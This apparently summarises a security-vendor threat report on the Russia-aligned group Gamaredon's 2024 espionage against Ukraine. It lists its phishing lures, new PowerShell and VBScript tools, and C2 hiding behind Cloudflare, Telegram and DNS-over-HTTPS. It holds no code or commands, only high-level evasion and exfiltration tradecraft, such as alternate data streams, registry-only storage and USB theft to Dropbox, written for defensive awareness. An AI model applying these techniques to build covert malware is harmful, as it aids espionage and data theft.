Gamaredon 2024: Stealthier Phishing Against Ukraine

ESET Research details how Russia-aligned APT Gamaredon intensified cyberespionage against Ukraine in 2024, modernizing its toolkit, scaling spearphishing, and concealing nearly all command-and-control (C2) traffic behind Cloudflare tunnels.

Highlights

• Exclusive focus on Ukrainian government targets; prior NATO probing dropped.
• Larger, more frequent spearphishing waves delivering HTA/LNK via RAR/ZIP/7z or XHTML (HTML smuggling). October saw rare hyperlink-only lures and LNKs that execute PowerShell from Cloudflare-generated domains.
• Six new tools aimed at stealth, persistence, and lateral movement.
• Major upgrades to core tools, boosting obfuscation, registry-only storage, and USB/network drive weaponization.
• Heavy reliance on third-party services (Telegram, Telegraph, Cloudflare, Dropbox) and DNS-over-HTTPS to shield C2.

New tools in 2024

• PteroDespair: Short-lived PowerShell recon to gather diagnostics from deployed malware.
• PteroTickle: PowerShell weaponizer that targets Python apps converted to executables, abusing Tcl/Tk components to move laterally.
• PteroGraphin: PowerShell payload channel using Telegraph API; initial Excel add-in persistence later simplified to scheduled tasks.
• PteroStew: VBScript downloader that hides code in NTFS alternate data streams.
• PteroQuark: New VBScript downloader component within the VBScript PteroLNK chain.
• PteroBox: PowerShell file stealer using WMI event subscriptions to detect USBs and exfiltrate to Dropbox while avoiding duplicates.

Upgrades to existing tools

• PteroPSDoor: Switches to FileSystemWatcher and WMI events for stealthy collection and USB detection; code stored in registry keys only.
• PteroLNK (VBScript): Now weaponizes mapped network drives alongside USBs; better obfuscation, more complex LNK creation, and registry tricks to hide files/extensions.
• PteroVDoor: Adds external platforms (e.g., Codeberg) to dynamically distribute C2 details.
• PteroPSLoad: Broad move back to Cloudflare tunnels, hiding most of the C2 estate behind Cloudflare subdomains.

Infrastructure and evasion

• Fast-flux continues at a reduced scale; domains dropped from 500+ (2023) to ~200 (2024).
• Third-party services (Telegram, Telegraph, Codeberg, Cloudflare) and DoH (Google, Cloudflare) help bypass domain blocks; operators also consult public resolver sites.
• New tricks include dropping embedded HTA/VBS in temp folders to resolve C2 separately, complicating detection.

Notable anomaly

• Mid-2024, a one-off VBScript payload opened the Guardians of Odessa Telegram channel to spread pro-Russian propaganda—unusual for Gamaredon but attributed with high confidence.

Outlook
Gamaredon remains a persistent, innovative threat to Ukrainian institutions. Expect continued spearphishing intensity, expanded lateral movement, and C2 concealment as the conflict endures.

Source: WeLiveSecurity